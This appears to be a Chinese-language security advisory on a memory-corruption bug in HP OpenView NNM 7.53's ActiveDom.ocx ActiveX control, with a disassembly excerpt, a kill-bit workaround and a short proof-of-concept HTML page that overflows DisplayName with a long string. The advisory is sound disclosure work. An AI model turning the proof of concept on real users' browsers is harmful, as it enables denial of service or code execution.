受影响系统:
HP OpenView Network Node Manager 7.53
描述:
HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
Openview所提供的ActiveDom.ocx控件在处理传送给多个方式的超长字符串时存在内存破坏漏洞,用户受骗访问恶意网页就可以触发这些漏洞,导致拒绝服务或执行任意代码。
这个漏洞被认定为低风险级别,因为该控件没有配置为Safe for Scripting或Safe for Initialization,因此未经用户确认无法利用这个漏洞。此外没有任何OpenView NNM的组件需要或使用这个控件。
以下是一些有漏洞的ActiveX控件的方式:
/—–
DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)
– —–/
以DisplayName()方式为例说明这个问题:
/—–
2000D408 MOV DWORD PTR SS:[EBP-4],-1
2000D40F JMP SHORT ACTIVE~1.2000D3D6
2000D411 MOV EAX,ACTIVE~1.200361A0
2000D416 JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B MOV EAX,ACTIVE~1.2000D4A8
2000D420 CALL <JMP.&MSVCRT._EH_prolog>
2000D425 SUB ESP,10
2000D428 PUSH EBX
2000D429 PUSH ESI
2000D42A PUSH EDI
2000D42B MOV DWORD PTR SS:[EBP-10],ESP
2000D42E MOV DWORD PTR SS:[EBP-14],ECX
2000D431 XOR EBX,EBX
2000D433 MOV DWORD PTR SS:[EBP-4],EBX
2000D436 LEA ESI,DWORD PTR DS:[ECX+28]
2000D439 MOV ECX,DWORD PTR DS:[ESI] ; ESI = 00038178
2000D43B MOV EAX,DWORD PTR DS:[ECX] ;
2000D43D CALL DWORD PTR DS:[EAX+48] ;
– —–/
<*来源:Damian Frizza
链接:http://marc.info/?l=full-disclosure&m=125849611501739&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<object classid=’clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE’ id=’target’
></object>
<script>
a = ""
for (i = 0; i < 10000; i++)
a = a + "A"
target.DisplayName(a)
</script>
</html>
建议: 临时解决方法:
* 为clsid A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE设置kill-bit。
厂商补丁:
HP
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。